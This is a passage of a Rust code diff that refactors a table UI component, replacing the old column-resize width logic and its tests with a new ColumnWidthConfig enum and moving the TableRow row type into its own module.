Scrollbars, SharedString, + StatefulInteractiveElement, Styled, StyledExt as _, StyledTypography, Window, WithScrollbar, + bind_redistributable_columns, div, example_group_with_title, h_flex, px, + render_redistributable_columns_resize_handles, single_example, table_row::{IntoTableRow as _, TableRow}, v_flex, }; -use itertools::intersperse_with; - -pub mod table_row { - //! A newtype for a table row that enforces a fixed column count at runtime. - //! - //! This type ensures that all rows in a table have the same width, preventing accidental creation or mutation of rows with inconsistent lengths. - //! It is especially useful for CSV or tabular data where rectangular invariants must be maintained, but the number of columns is only known at runtime. - //! 
By using `TableRow`, we gain stronger guarantees and safer APIs compared to a bare `Vec`, without requiring const generics. - - use std::{ - any::type_name, - ops::{ - Index, IndexMut, Range, RangeFrom, RangeFull, RangeInclusive, RangeTo, RangeToInclusive, - }, - }; - - #[derive(Clone, Debug, PartialEq, Eq)] - pub struct TableRow(Vec); - - impl TableRow { - /// Constructs a `TableRow` from a `Vec`, panicking if the length does not match `expected_length`. - /// - /// Use this when you want to ensure at construction time that the row has the correct number of columns. - /// This enforces the rectangular invariant for table data, preventing accidental creation of malformed rows. - /// - /// # Panics - /// Panics if `data.len() != expected_length`. - pub fn from_vec(data: Vec, expected_length: usize) -> Self { - Self::try_from_vec(data, expected_length).unwrap_or_else(|e| { - let name = type_name::>(); - panic!("Expected {name} to be created successfully: {e}"); - }) - } - - /// Attempts to construct a `TableRow` from a `Vec`, returning an error if the length does not match `expected_len`. - /// - /// This is a fallible alternative to `from_vec`, allowing you to handle inconsistent row lengths gracefully. - /// Returns `Ok(TableRow)` if the length matches, or an `Err` with a descriptive message otherwise. - pub fn try_from_vec(data: Vec, expected_len: usize) -> Result { - if data.len() != expected_len { - Err(format!( - "Row length {} does not match expected {}", - data.len(), - expected_len - )) - } else { - Ok(Self(data)) - } - } - - /// Returns reference to element by column index. - /// - /// # Panics - /// Panics if `col` is out of bounds (i.e., `col >= self.cols()`). 
- pub fn expect_get(&self, col: usize) -> &T { - self.0.get(col).unwrap_or_else(|| { - panic!( - "Expected table row of `{}` to have {col:?}", - type_name::() - ) - }) - } - - pub fn get(&self, col: usize) -> Option<&T> { - self.0.get(col) - } - - pub fn as_slice(&self) -> &[T] { - &self.0 - } - - pub fn into_vec(self) -> Vec { - self.0 - } - - /// Like [`map`], but borrows the row and clones each element before mapping. - /// - /// This is useful when you want to map over a borrowed row without consuming it, - /// but your mapping function requires ownership of each element. - /// - /// # Difference - /// - `map_cloned` takes `&self`, clones each element, and applies `f(T) -> U`. - /// - [`map`] takes `self` by value and applies `f(T) -> U` directly, consuming the row. - /// - [`map_ref`] takes `&self` and applies `f(&T) -> U` to references of each element. - pub fn map_cloned(&self, f: F) -> TableRow - where - F: FnMut(T) -> U, - T: Clone, - { - self.clone().map(f) - } - - /// Consumes the row and transforms all elements within it in a length-safe way. - /// - /// # Difference - /// - `map` takes ownership of the row (`self`) and applies `f(T) -> U` to each element. - /// - Use this when you want to transform and consume the row in one step. - /// - See also [`map_cloned`] (for mapping over a borrowed row with cloning) and [`map_ref`] (for mapping over references). - pub fn map(self, f: F) -> TableRow - where - F: FnMut(T) -> U, - { - TableRow(self.0.into_iter().map(f).collect()) - } - - /// Borrows the row and transforms all elements by reference in a length-safe way. - /// - /// # Difference - /// - `map_ref` takes `&self` and applies `f(&T) -> U` to each element by reference. - /// - Use this when you want to map over a borrowed row without cloning or consuming it. - /// - See also [`map`] (for consuming the row) and [`map_cloned`] (for mapping with cloning). 
- pub fn map_ref(&self, f: F) -> TableRow - where - F: FnMut(&T) -> U, - { - TableRow(self.0.iter().map(f).collect()) - } - - /// Number of columns (alias to `len()` with more semantic meaning) - pub fn cols(&self) -> usize { - self.0.len() - } - } - - ///// Convenience traits ///// - pub trait IntoTableRow { - fn into_table_row(self, expected_length: usize) -> TableRow; - } - impl IntoTableRow for Vec { - fn into_table_row(self, expected_length: usize) -> TableRow { - TableRow::from_vec(self, expected_length) - } - } - - // Index implementations for convenient access - impl Index for TableRow { - type Output = T; - - fn index(&self, index: usize) -> &Self::Output { - &self.0[index] - } - } - impl IndexMut for TableRow { - fn index_mut(&mut self, index: usize) -> &mut Self::Output { - &mut self.0[index] - } - } - - // Range indexing implementations for slice operations - impl Index> for TableRow { - type Output = [T]; - - fn index(&self, index: Range) -> &Self::Output { - as Index>>::index(&self.0, index) - } - } - - impl Index> for TableRow { - type Output = [T]; - - fn index(&self, index: RangeFrom) -> &Self::Output { - as Index>>::index(&self.0, index) - } - } - - impl Index> for TableRow { - type Output = [T]; - - fn index(&self, index: RangeTo) -> &Self::Output { - as Index>>::index(&self.0, index) - } - } - - impl Index> for TableRow { - type Output = [T]; - - fn index(&self, index: RangeToInclusive) -> &Self::Output { - as Index>>::index(&self.0, index) - } - } - - impl Index for TableRow { - type Output = [T]; - - fn index(&self, index: RangeFull) -> &Self::Output { - as Index>::index(&self.0, index) - } - } - - impl Index> for TableRow { - type Output = [T]; - - fn index(&self, index: RangeInclusive) -> &Self::Output { - as Index>>::index(&self.0, index) - } - } - - impl IndexMut> for TableRow { - fn index_mut(&mut self, index: RangeInclusive) -> &mut Self::Output { - as IndexMut>>::index_mut(&mut self.0, index) - } - } -} - -const RESIZE_COLUMN_WIDTH: f32 
= 8.0; +pub mod table_row; +#[cfg(test)] +mod tests; /// Represents an unchecked table row, which is a vector of elements. /// Will be converted into `TableRow` internally pub type UncheckedTableRow = Vec; -#[derive(Debug)] -struct DraggedColumn(usize); - struct UniformListData { render_list_of_rows_fn: Box, &mut Window, &mut App) -> Vec>>, @@ -309,414 +105,105 @@ impl TableInteractionState { view.update(cx, |view, cx| f(view, e, window, cx)).ok(); } } - - /// Renders invisible resize handles overlaid on top of table content. - /// - /// - Spacer: invisible element that matches the width of table column content - /// - Divider: contains the actual resize handle that users can drag to resize columns - /// - /// Structure: [spacer] [divider] [spacer] [divider] [spacer] - /// - /// Business logic: - /// 1. Creates spacers matching each column width - /// 2. Intersperses (inserts) resize handles between spacers (interactive only for resizable columns) - /// 3. Each handle supports hover highlighting, double-click to reset, and drag to resize - /// 4. 
Returns an absolute-positioned overlay that sits on top of table content - fn render_resize_handles( - &self, - column_widths: &TableRow, - resizable_columns: &TableRow, - initial_sizes: &TableRow, - columns: Option>, - window: &mut Window, - cx: &mut App, - ) -> AnyElement { - let spacers = column_widths - .as_slice() - .iter() - .map(|width| base_cell_style(Some(*width)).into_any_element()); - - let mut column_ix = 0; - let resizable_columns_shared = Rc::new(resizable_columns.clone()); - let initial_sizes_shared = Rc::new(initial_sizes.clone()); - let mut resizable_columns_iter = resizable_columns.as_slice().iter(); - - // Insert dividers between spacers (column content) - let dividers = intersperse_with(spacers, || { - let resizable_columns = Rc::clone(&resizable_columns_shared); - let initial_sizes = Rc::clone(&initial_sizes_shared); - window.with_id(column_ix, |window| { - let mut resize_divider = div() - // This is required because this is evaluated at a different time than the use_state call above - .id(column_ix) - .relative() - .top_0() - .w_px() - .h_full() - .bg(cx.theme().colors().border.opacity(0.8)); - - let mut resize_handle = div() - .id("column-resize-handle") - .absolute() - .left_neg_0p5() - .w(px(RESIZE_COLUMN_WIDTH)) - .h_full(); - - if resizable_columns_iter - .next() - .is_some_and(TableResizeBehavior::is_resizable) - { - let hovered = window.use_state(cx, |_window, _cx| false); - - resize_divider = resize_divider.when(*hovered.read(cx), |div| { - div.bg(cx.theme().colors().border_focused) - }); - - resize_handle = resize_handle - .on_hover(move |&was_hovered, _, cx| hovered.write(cx, was_hovered)) - .cursor_col_resize() - .when_some(columns.clone(), |this, columns| { - this.on_click(move |event, window, cx| { - if event.click_count() >= 2 { - columns.update(cx, |columns, _| { - columns.on_double_click( - column_ix, - &initial_sizes, - &resizable_columns, - window, - ); - }) - } - - cx.stop_propagation(); - }) - }) - 
.on_drag(DraggedColumn(column_ix), |_, _offset, _window, cx| { - cx.new(|_cx| gpui::Empty) - }) - } - - column_ix += 1; - resize_divider.child(resize_handle).into_any_element() - }) - }); - - h_flex() - .id("resize-handles") - .absolute() - .inset_0() - .w_full() - .children(dividers) - .into_any_element() - } } -#[derive(Debug, Copy, Clone, PartialEq)] -pub enum TableResizeBehavior { - None, - Resizable, - MinSize(f32), +pub enum ColumnWidthConfig { + /// Static column widths (no resize handles). + Static { + widths: StaticColumnWidths, + /// Controls widths of the whole table. + table_width: Option, + }, + /// Redistributable columns — dragging redistributes the fixed available space + /// among columns without changing the overall table width. + Redistributable { + columns_state: Entity, + table_width: Option, + }, } -impl TableResizeBehavior { - pub fn is_resizable(&self) -> bool { - *self != TableResizeBehavior::None - } - - pub fn min_size(&self) -> Option { - match self { - TableResizeBehavior::None => None, - TableResizeBehavior::Resizable => Some(0.05), - TableResizeBehavior::MinSize(min_size) => Some(*min_size), - } - } +pub enum StaticColumnWidths { + /// All columns share space equally (flex-1 / Length::Auto). + Auto, + /// Each column has a specific width. 
+ Explicit(TableRow), } -pub struct TableColumnWidths { - widths: TableRow, - visible_widths: TableRow, - cached_bounds_width: Pixels, - initialized: bool, -} - -impl TableColumnWidths { - pub fn new(cols: usize, _: &mut App) -> Self { - Self { - widths: vec![DefiniteLength::default(); cols].into_table_row(cols), - visible_widths: vec![DefiniteLength::default(); cols].into_table_row(cols), - cached_bounds_width: Default::default(), - initialized: false, - } - } - - pub fn cols(&self) -> usize { - self.widths.cols() - } - - fn get_fraction(length: &DefiniteLength, bounds_width: Pixels, rem_size: Pixels) -> f32 { - match length { - DefiniteLength::Absolute(AbsoluteLength::Pixels(pixels)) => *pixels / bounds_width, - DefiniteLength::Absolute(AbsoluteLength::Rems(rems_width)) => { - rems_width.to_pixels(rem_size) / bounds_width - } - DefiniteLength::Fraction(fraction) => *fraction, +impl ColumnWidthConfig { + /// Auto-width columns, auto-size table. + pub fn auto() -> Self { + ColumnWidthConfig::Static { + widths: StaticColumnWidths::Auto, + table_width: None, } } - fn on_double_click( - &mut self, - double_click_position: usize, - initial_sizes: &TableRow, - resize_behavior: &TableRow, - window: &mut Window, - ) { - let bounds_width = self.cached_bounds_width; - let rem_size = window.rem_size(); - let initial_sizes = - initial_sizes.map_ref(|length| Self::get_fraction(length, bounds_width, rem_size)); - let widths = self - .widths - .map_ref(|length| Self::get_fraction(length, bounds_width, rem_size)); - - let updated_widths = Self::reset_to_initial_size( - double_click_position, - widths, - initial_sizes, - resize_behavior, - ); - self.widths = updated_widths.map(DefiniteLength::Fraction); - self.visible_widths = self.widths.clone(); // previously was copy - } - - fn reset_to_initial_size( - col_idx: usize, - mut widths: TableRow, - initial_sizes: TableRow, - resize_behavior: &TableRow, - ) -> TableRow { - // RESET: - // Part 1: - // Figure out if we should 
shrink/grow the selected column - // Get diff which represents the change in column we want to make initial size delta curr_size = diff - // - // Part 2: We need to decide which side column we should move and where - // - // If we want to grow our column we should check the left/right columns diff to see what side - // has a greater delta than their initial size. Likewise, if we shrink our column we should check - // the left/right column diffs to see what side has the smallest delta. - // - // Part 3: resize - // - // col_idx represents the column handle to the right of an active column - // - // If growing and right has the greater delta { - // shift col_idx to the right - // } else if growing and left has the greater delta { - // shift col_idx - 1 to the left - // } else if shrinking and the right has the greater delta { - // shift - // } { - // - // } - // } - // - // if we need to shrink, then if the right - // - - // DRAGGING - // we get diff which represents the change in the _drag handle_ position - // -diff => dragging left -> - // grow the column to the right of the handle as much as we can shrink columns to the left of the handle - // +diff => dragging right -> growing handles column - // grow the column to the left of the handle as much as we can shrink columns to the right of the handle - // - - let diff = initial_sizes[col_idx] - widths[col_idx]; - - let left_diff = - initial_sizes[..col_idx].iter().sum::() - widths[..col_idx].iter().sum::(); - let right_diff = initial_sizes[col_idx + 1..].iter().sum::() - - widths[col_idx + 1..].iter().sum::(); - - let go_left_first = if diff < 0.0 { - left_diff > right_diff - } else { - left_diff < right_diff - }; - - if !go_left_first { - let diff_remaining = - Self::propagate_resize_diff(diff, col_idx, &mut widths, resize_behavior, 1); - - if diff_remaining != 0.0 && col_idx > 0 { - Self::propagate_resize_diff( - diff_remaining, - col_idx, - &mut widths, - resize_behavior, - -1, - ); - } - } else { - let 
diff_remaining = - Self::propagate_resize_diff(diff, col_idx, &mut widths, resize_behavior, -1); - - if diff_remaining != 0.0 { - Self::propagate_resize_diff( - diff_remaining, - col_idx, - &mut widths, - resize_behavior, - 1, - ); - } + /// Redistributable columns with no fixed table width. + pub fn redistributable(columns_state: Entity) -> Self { + ColumnWidthConfig::Redistributable { + columns_state, + table_width: None, } - - widths } - fn on_drag_move( - &mut self, - drag_event: &DragMoveEvent, - resize_behavior: &TableRow, - window: &mut Window, - cx: &mut Context, - ) { - let drag_position = drag_event.event.position; - let bounds = drag_event.bounds; - - let mut col_position = 0.0; - let rem_size = window.rem_size(); - let bounds_width = bounds.right() - bounds.left(); - let col_idx = drag_event.drag(cx).0; - - let column_handle_width = Self::get_fraction( - &DefiniteLength::Absolute(AbsoluteLength::Pixels(px(RESIZE_COLUMN_WIDTH))), - bounds_width, - rem_size, - ); - - let mut widths = self - .widths - .map_ref(|length| Self::get_fraction(length, bounds_width, rem_size)); - - for length in widths[0..=col_idx].iter() { - col_position += length + column_handle_width; + /// Auto-width columns, fixed table width. 
+ pub fn auto_with_table_width(width: impl Into) -> Self { + ColumnWidthConfig::Static { + widths: StaticColumnWidths::Auto, + table_width: Some(width.into()), } - - let mut total_length_ratio = col_position; - for length in widths[col_idx + 1..].iter() { - total_length_ratio += length; - } - let cols = resize_behavior.cols(); - total_length_ratio += (cols - 1 - col_idx) as f32 * column_handle_width; - - let drag_fraction = (drag_position.x - bounds.left()) / bounds_width; - let drag_fraction = drag_fraction * total_length_ratio; - let diff = drag_fraction - col_position - column_handle_width / 2.0; - - Self::drag_column_handle(diff, col_idx, &mut widths, resize_behavior); - - self.visible_widths = widths.map(DefiniteLength::Fraction); } - fn drag_column_handle( - diff: f32, - col_idx: usize, - widths: &mut TableRow, - resize_behavior: &TableRow, - ) { - // if diff > 0.0 then go right - if diff > 0.0 { - Self::propagate_resize_diff(diff, col_idx, widths, resize_behavior, 1); - } else { - Self::propagate_resize_diff(-diff, col_idx + 1, widths, resize_behavior, -1); + /// Explicit column widths with no fixed table width. 
+ pub fn explicit>(widths: Vec) -> Self { + let cols = widths.len(); + ColumnWidthConfig::Static { + widths: StaticColumnWidths::Explicit( + widths + .into_iter() + .map(Into::into) + .collect::>() + .into_table_row(cols), + ), + table_width: None, } } - fn propagate_resize_diff( - diff: f32, - col_idx: usize, - widths: &mut TableRow, - resize_behavior: &TableRow, - direction: i8, - ) -> f32 { - let mut diff_remaining = diff; - if resize_behavior[col_idx].min_size().is_none() { - return diff; - } - - let step_right; - let step_left; - if direction < 0 { - step_right = 0; - step_left = 1; - } else { - step_right = 1; - step_left = 0; - } - if col_idx == 0 && direction < 0 { - return diff; - } - let mut curr_column = col_idx + step_right - step_left; - - while diff_remaining != 0.0 && curr_column < widths.cols() { - let Some(min_size) = resize_behavior[curr_column].min_size() else { - if curr_column == 0 { - break; - } - curr_column -= step_left; - curr_column += step_right; - continue; - }; - - let curr_width = widths[curr_column] - diff_remaining; - widths[curr_column] = curr_width; - - if min_size > curr_width { - diff_remaining = min_size - curr_width; - widths[curr_column] = min_size; - } else { - diff_remaining = 0.0; - break; - } - if curr_column == 0 { - break; + /// Column widths for rendering. + pub fn widths_to_render(&self, cx: &App) -> Option> { + match self { + ColumnWidthConfig::Static { + widths: StaticColumnWidths::Auto, + .. + } => None, + ColumnWidthConfig::Static { + widths: StaticColumnWidths::Explicit(widths), + .. + } => Some(widths.map_cloned(Length::Definite)), + ColumnWidthConfig::Redistributable { + columns_state: entity, + .. + } => Some(entity.read(cx).widths_to_render()), + } + } + + /// Table-level width. + pub fn table_width(&self) -> Option { + match self { + ColumnWidthConfig::Static { table_width, .. } + | ColumnWidthConfig::Redistributable { table_width, .. 
} => { + table_width.map(Length::Definite) } - curr_column -= step_left; - curr_column += step_right; } - widths[col_idx] = widths[col_idx] + (diff - diff_remaining); - - diff_remaining } -} - -pub struct TableWidths { - initial: TableRow, - current: Option>, - resizable: TableRow, -} - -impl TableWidths { - pub fn new(widths: TableRow>) -> Self { - let widths = widths.map(Into::into); - let expected_length = widths.cols(); - TableWidths { - initial: widths, - current: None, - resizable: vec![TableResizeBehavior::None; expected_length] - .into_table_row(expected_length), + /// ListHorizontalSizingBehavior for uniform_list. + pub fn list_horizontal_sizing(&self) -> ListHorizontalSizingBehavior { + match self.table_width() { + Some(_) => ListHorizontalSizingBehavior::Unconstrained, + None => ListHorizontalSizingBehavior::FitList, } } - - fn lengths(&self, cx: &App) -> TableRow { - self.current - .as_ref() - .map(|entity| entity.read(cx).visible_widths.map_cloned(Length::Definite)) - .unwrap_or_else(|| self.initial.map_cloned(Length::Definite)) - } } /// A table component @@ -725,16 +212,16 @@ pub struct Table { striped: bool, show_row_borders: bool, show_row_hover: bool, - width: Option, headers: Option>, rows: TableContents, interaction_state: Option>, - col_widths: Option, + column_width_config: ColumnWidthConfig, map_row: Option), &mut Window, &mut App) -> AnyElement>>, use_ui_font: bool, empty_table_callback: Option AnyElement>>, /// The number of columns in the table. 
Used to assert column numbers in `TableRow` collections cols: usize, + disable_base_cell_style: bool, } impl Table { @@ -745,17 +232,26 @@ impl Table { striped: false, show_row_borders: true, show_row_hover: true, - width: None, headers: None, rows: TableContents::Vec(Vec::new()), interaction_state: None, map_row: None, use_ui_font: true, empty_table_callback: None, - col_widths: None, + disable_base_cell_style: false, + column_width_config: ColumnWidthConfig::auto(), } } + /// Disables based styling of row cell (paddings, text ellipsis, nowrap, etc), keeping width settings + /// + /// Doesn't affect base style of header cell. + /// Doesn't remove overflow-hidden + pub fn disable_base_style(mut self) -> Self { + self.disable_base_cell_style = true; + self + } + /// Enables uniform list rendering. /// The provided function will be passed directly to the `uniform_list` element. /// Therefore, if this method is called, any calls to [`Table::row`] before or after @@ -814,10 +310,18 @@ impl Table { self } - /// Sets the width of the table. - /// Will enable horizontal scrolling if [`Self::interactable`] is also called. - pub fn width(mut self, width: impl Into) -> Self { - self.width = Some(width.into()); + /// Sets a fixed table width with auto column widths. + /// + /// This is a shorthand for `.width_config(ColumnWidthConfig::auto_with_table_width(width))`. + /// For resizable columns or explicit column widths, use [`Table::width_config`] directly. + pub fn width(mut self, width: impl Into) -> Self { + self.column_width_config = ColumnWidthConfig::auto_with_table_width(width); + self + } + + /// Sets the column width configuration for the table. + pub fn width_config(mut self, config: ColumnWidthConfig) -> Self { + self.column_width_config = config; self } @@ -825,10 +329,8 @@ impl Table { /// /// Vertical scrolling will be enabled by default if the table is taller than its container. 
/// - /// Horizontal scrolling will only be enabled if [`Self::width`] is also called, otherwise - /// the list will always shrink the table columns to fit their contents I.e. If [`Self::uniform_list`] - /// is used without a width and with [`Self::interactable`], the [`ListHorizontalSizingBehavior`] will - /// be set to [`ListHorizontalSizingBehavior::FitList`]. + /// Horizontal scrolling will only be enabled if a table width is set via [`ColumnWidthConfig`], + /// otherwise the list will always shrink the table columns to fit their contents. pub fn interactable(mut self, interaction_state: &Entity) -> Self { self.interaction_state = Some(interaction_state.downgrade()); self @@ -854,36 +356,6 @@ impl Table { self } - pub fn column_widths(mut self, widths: UncheckedTableRow>) -> Self { - if self.col_widths.is_none() { - self.col_widths = Some(TableWidths::new(widths.into_table_row(self.cols))); - } - self - } - - pub fn resizable_columns( - mut self, - resizable: UncheckedTableRow, - column_widths: &Entity, - cx: &mut App, - ) -> Self { - if let Some(table_widths) = self.col_widths.as_mut() { - table_widths.resizable = resizable.into_table_row(self.cols); - let column_widths = table_widths - .current - .get_or_insert_with(|| column_widths.clone()); - - column_widths.update(cx, |widths, _| { - if !widths.initialized { - widths.initialized = true; - widths.widths = table_widths.initial.clone(); - widths.visible_widths = widths.widths.clone(); - } - }) - } - self - } - pub fn no_ui_font(mut self) -> Self { self.use_ui_font = false; self @@ -973,10 +445,18 @@ pub fn render_table_row( .into_iter() .zip(column_widths.into_vec()) .map(|(cell, width)| { - base_cell_style_text(width, table_context.use_ui_font, cx) - .px_1() - .py_0p5() - .child(cell) + if table_context.disable_base_cell_style { + div() + .when_some(width, |this, width| this.w(width)) + .when(width.is_none(), |this| this.flex_1()) + .overflow_hidden() + .child(cell) + } else { + base_cell_style_text(width, 
table_context.use_ui_font, cx) + .px_1() + .py_0p5() + .child(cell) + } }), ); @@ -992,11 +472,7 @@ pub fn render_table_row( pub fn render_table_header( headers: TableRow, table_context: TableRenderContext, - columns_widths: Option<( - WeakEntity, - TableRow, - TableRow, - )>, + resize_info: Option, entity_id: Option, cx: &mut App, ) -> impl IntoElement { @@ -1017,9 +493,7 @@ pub fn render_table_header( .flex() .flex_row() .items_center() - .justify_between() .w_full() - .p_2() .border_b_1() .border_color(cx.theme().colors().border) .children( @@ -1030,34 +504,30 @@ pub fn render_table_header( .zip(column_widths.into_vec()) .map(|((header_idx, h), width)| { base_cell_style_text(width, table_context.use_ui_font, cx) + .px_1() + .py_0p5() .child(h) .id(ElementId::NamedInteger( shared_element_id.clone(), header_idx as u64, )) - .when_some( - columns_widths.as_ref().cloned(), - |this, (column_widths, resizables, initial_sizes)| { - if resizables[header_idx].is_resizable() { - this.on_click(move |event, window, cx| { - if event.click_count() > 1 { - column_widths - .update(cx, |column, _| { - column.on_double_click( - header_idx, - &initial_sizes, - &resizables, - window, - ); - }) - .ok(); - } - }) - } else { - this - } - }, - ) + .when_some(resize_info.as_ref().cloned(), |this, info| { + if info.resize_behavior[header_idx].is_resizable() { + this.on_click(move |event, window, cx| { + if event.click_count() > 1 { + info.columns_state + .update(cx, |column, _| { + column.reset_column_to_initial_width( + header_idx, window, + ); + }) + .ok(); + } + }) + } else { + this + } + }) }), ) } @@ -1071,6 +541,7 @@ pub struct TableRenderContext { pub column_widths: Option>, pub map_row: Option), &mut Window, &mut App) -> AnyElement>>, pub use_ui_font: bool, + pub disable_base_cell_style: bool, } impl TableRenderContext { @@ -1080,9 +551,23 @@ impl TableRenderContext { show_row_borders: table.show_row_borders, show_row_hover: table.show_row_hover, total_row_count: 
table.rows.len(), - column_widths: table.col_widths.as_ref().map(|widths| widths.lengths(cx)), + column_widths: table.column_width_config.widths_to_render(cx), map_row: table.map_row.clone(), use_ui_font: table.use_ui_font, + disable_base_cell_style: table.disable_base_cell_style, + } + } + + pub fn for_column_widths(column_widths: Option>, use_ui_font: bool) -> Self { + Self { + striped: false, + show_row_borders: true, + show_row_hover: true, + total_row_count: 0, + column_widths, + map_row: None, + use_ui_font, + disable_base_cell_style: false, } } } @@ -1091,73 +576,58 @@ impl RenderOnce for Table { fn render(mut self, window: &mut Window, cx: &mut App) -> impl IntoElement { let table_context = TableRenderContext::new(&self, cx); let interaction_state = self.interaction_state.and_then(|state| state.upgrade()); - let current_widths = self - .col_widths - .as_ref() - .and_then(|widths| Some((widths.current.as_ref()?, widths.resizable.clone()))) - .map(|(curr, resize_behavior)| (curr.downgrade(), resize_behavior)); - - let current_widths_with_initial_sizes = self - .col_widths - .as_ref() - .and_then(|widths| { - Some(( - widths.current.as_ref()?, - widths.resizable.clone(), - widths.initial.clone(), - )) - }) - .map(|(curr, resize_behavior, initial)| (curr.downgrade(), resize_behavior, initial)); - let width = self.width; + let header_resize_info = + interaction_state + .as_ref() + .and_then(|_| match &self.column_width_config { + ColumnWidthConfig::Redistributable { columns_state, .. 
} => { + Some(HeaderResizeInfo::from_state(columns_state, cx)) + } + _ => None, + }); + + let table_width = self.column_width_config.table_width(); + let horizontal_sizing = self.column_width_config.list_horizontal_sizing(); let no_rows_rendered = self.rows.is_empty(); + // Extract redistributable entity for drag/drop/prepaint handlers + let redistributable_entity = + interaction_state + .as_ref() + .and_then(|_| match &self.column_width_config { + ColumnWidthConfig::Redistributable { + columns_state: entity, + .. + } => Some(entity.clone()), + _ => None, + }); + + let resize_handles = + interaction_state + .as_ref() + .and_then(|_| match &self.column_width_config { + ColumnWidthConfig::Redistributable { columns_state, .. } => Some( + render_redistributable_columns_resize_handles(columns_state, window, cx), + ), + _ => None, + }); + let table = div() - .when_some(width, |this, width| this.w(width)) + .when_some(table_width, |this, width| this.w(width)) .h_full() .v_flex() .when_some(self.headers.take(), |this, headers| { this.child(render_table_header( headers, table_context.clone(), - current_widths_with_initial_sizes, + header_resize_info, interaction_state.as_ref().map(Entity::entity_id), cx, )) }) - .when_some(current_widths, { - |this, (widths, resize_behavior)| { - this.on_drag_move::({ - let widths = widths.clone(); - move |e, window, cx| { - widths - .update(cx, |widths, cx| { - widths.on_drag_move(e, &resize_behavior, window, cx); - }) - .ok(); - } - }) - .on_children_prepainted({ - let widths = widths.clone(); - move |bounds, _, cx| { - widths - .update(cx, |widths, _| { - // This works because all children x axis bounds are the same - widths.cached_bounds_width = - bounds[0].right() - bounds[0].left(); - }) - .ok(); - } - }) - .on_drop::(move |_, _, cx| { - widths - .update(cx, |widths, _| { - widths.widths = widths.visible_widths.clone(); - }) - .ok(); - // Finish the resize operation - }) - } + .when_some(redistributable_entity, |this, widths| { + 
bind_redistributable_columns(this, widths) }) .child({ let content = div() @@ -1207,11 +677,7 @@ impl RenderOnce for Table { .size_full() .flex_grow() .with_sizing_behavior(ListSizingBehavior::Auto) - .with_horizontal_sizing_behavior(if width.is_some() { - ListHorizontalSizingBehavior::Unconstrained - } else { - ListHorizontalSizingBehavior::FitList - }) + .with_horizontal_sizing_behavior(horizontal_sizing) .when_some( interaction_state.as_ref(), |this, state| { @@ -1241,25 +707,7 @@ impl RenderOnce for Table { .with_sizing_behavior(ListSizingBehavior::Auto), ), }) - .when_some( - self.col_widths.as_ref().zip(interaction_state.as_ref()), - |parent, (table_widths, state)| { - parent.child(state.update(cx, |state, cx| { - let resizable_columns = &table_widths.resizable; - let column_widths = table_widths.lengths(cx); - let columns = table_widths.current.clone(); - let initial_sizes = &table_widths.initial; - state.render_resize_handles( - &column_widths, - resizable_columns, - initial_sizes, - columns, - window, - cx, - ) - })) - }, - ); + .when_some(resize_handles, |parent, handles| parent.child(handles)); if let Some(state) = interaction_state.as_ref() { let scrollbars = state @@ -1416,330 +864,3 @@ impl Component for Table { ) } } - -#[cfg(test)] -mod test { - use super::*; - - fn is_almost_eq(a: &[f32], b: &[f32]) -> bool { - a.len() == b.len() && a.iter().zip(b).all(|(x, y)| (x - y).abs() < 1e-6) - } - - fn cols_to_str(cols: &[f32], total_size: f32) -> String { - cols.iter() - .map(|f| "*".repeat(f32::round(f * total_size) as usize)) - .collect::>() - .join("|") - } - - fn parse_resize_behavior( - input: &str, - total_size: f32, - expected_cols: usize, - ) -> Vec { - let mut resize_behavior = Vec::with_capacity(expected_cols); - for col in input.split('|') { - if col.starts_with('X') || col.is_empty() { - resize_behavior.push(TableResizeBehavior::None); - } else if col.starts_with('*') { - resize_behavior.push(TableResizeBehavior::MinSize(col.len() as f32 / 
total_size)); - } else { - panic!("invalid test input: unrecognized resize behavior: {}", col); - } - } - - if resize_behavior.len() != expected_cols { - panic!( - "invalid test input: expected {} columns, got {}", - expected_cols, - resize_behavior.len() - ); - } - resize_behavior - } - - mod reset_column_size { - use super::*; - - fn parse(input: &str) -> (Vec, f32, Option) { - let mut widths = Vec::new(); - let mut column_index = None; - for (index, col) in input.split('|').enumerate() { - widths.push(col.len() as f32); - if col.starts_with('X') { - column_index = Some(index); - } - } - - for w in &widths { - assert!(w.is_finite(), "incorrect number of columns"); - } - let total = widths.iter().sum::(); - for width in &mut widths { - *width /= total; - } - (widths, total, column_index) - } - - #[track_caller] - fn check_reset_size( - initial_sizes: &str, - widths: &str, - expected: &str, - resize_behavior: &str, - ) { - let (initial_sizes, total_1, None) = parse(initial_sizes) else { - panic!("invalid test input: initial sizes should not be marked"); - }; - let (widths, total_2, Some(column_index)) = parse(widths) else { - panic!("invalid test input: widths should be marked"); - }; - assert_eq!( - total_1, total_2, - "invalid test input: total width not the same {total_1}, {total_2}" - ); - let (expected, total_3, None) = parse(expected) else { - panic!("invalid test input: expected should not be marked: {expected:?}"); - }; - assert_eq!( - total_2, total_3, - "invalid test input: total width not the same" - ); - let cols = initial_sizes.len(); - let resize_behavior_vec = parse_resize_behavior(resize_behavior, total_1, cols); - let resize_behavior = TableRow::from_vec(resize_behavior_vec, cols); - let result = TableColumnWidths::reset_to_initial_size( - column_index, - TableRow::from_vec(widths, cols), - TableRow::from_vec(initial_sizes, cols), - &resize_behavior, - ); - let result_slice = result.as_slice(); - let is_eq = is_almost_eq(result_slice, &expected); - 
if !is_eq { - let result_str = cols_to_str(result_slice, total_1); - let expected_str = cols_to_str(&expected, total_1); - panic!( - "resize failed\ncomputed: {result_str}\nexpected: {expected_str}\n\ncomputed values: {result_slice:?}\nexpected values: {expected:?}\n:minimum widths: {resize_behavior:?}" - ); - } - } - - macro_rules! check_reset_size { - (columns: $cols:expr, starting: $initial:expr, snapshot: $current:expr, expected: $expected:expr, resizing: $resizing:expr $(,)?) => { - check_reset_size($initial, $current, $expected, $resizing); - }; - ($name:ident, columns: $cols:expr, starting: $initial:expr, snapshot: $current:expr, expected: $expected:expr, minimums: $resizing:expr $(,)?) => { - #[test] - fn $name() { - check_reset_size($initial, $current, $expected, $resizing); - } - }; - } - - check_reset_size!( - basic_right, - columns: 5, - starting: "**|**|**|**|**", - snapshot: "**|**|X|***|**", - expected: "**|**|**|**|**", - minimums: "X|*|*|*|*", - ); - - check_reset_size!( - basic_left, - columns: 5, - starting: "**|**|**|**|**", - snapshot: "**|**|***|X|**", - expected: "**|**|**|**|**", - minimums: "X|*|*|*|**", - ); - - check_reset_size!( - squashed_left_reset_col2, - columns: 6, - starting: "*|***|**|**|****|*", - snapshot: "*|*|X|*|*|********", - expected: "*|*|**|*|*|*******", - minimums: "X|*|*|*|*|*", - ); - - check_reset_size!( - grow_cascading_right, - columns: 6, - starting: "*|***|****|**|***|*", - snapshot: 